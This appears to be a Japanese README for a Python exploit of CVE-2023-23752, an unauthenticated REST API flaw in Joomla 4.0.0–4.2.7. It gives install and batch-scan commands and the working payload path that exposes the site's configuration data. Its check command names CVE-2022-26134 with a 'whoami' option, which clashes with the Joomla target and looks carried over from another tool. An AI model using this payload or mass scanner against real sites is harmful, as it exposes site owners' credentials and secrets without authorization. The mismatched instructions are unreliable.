
CVE-2023-23752のPythonベースのエクスプロイト。Joomla 4.0.0-4.2.7の不正なREST APIアクセスを標的とし、細工されたペイロードによる機密情報の開示を可能にします。
CVE-2023-23752 - Joomla 未承認アクセス脆弱性の再現
Pythonライブラリのインストール
pip install -r requirements.txt
脆弱性の検証
python3 CVE-2022-26134_check.py -u url -c whoami

バッチスキャン
python3 CVE-2023-23752.py -f url_part.txt

4.0.0 <= Joomla <= 4.2.7
payload:
/api/index.php/v1/config/application?public=true
脆弱性のあるURLにアクセスし、パケットをキャプチャしてリプレイします

Joomla! CMS バージョン4.0.0~4.2.7では、Webサービスエンドポイントへのアクセス制限が不適切なため、REST APIへの未承認アクセスが発生し、機密情報が漏えいする可能性があります。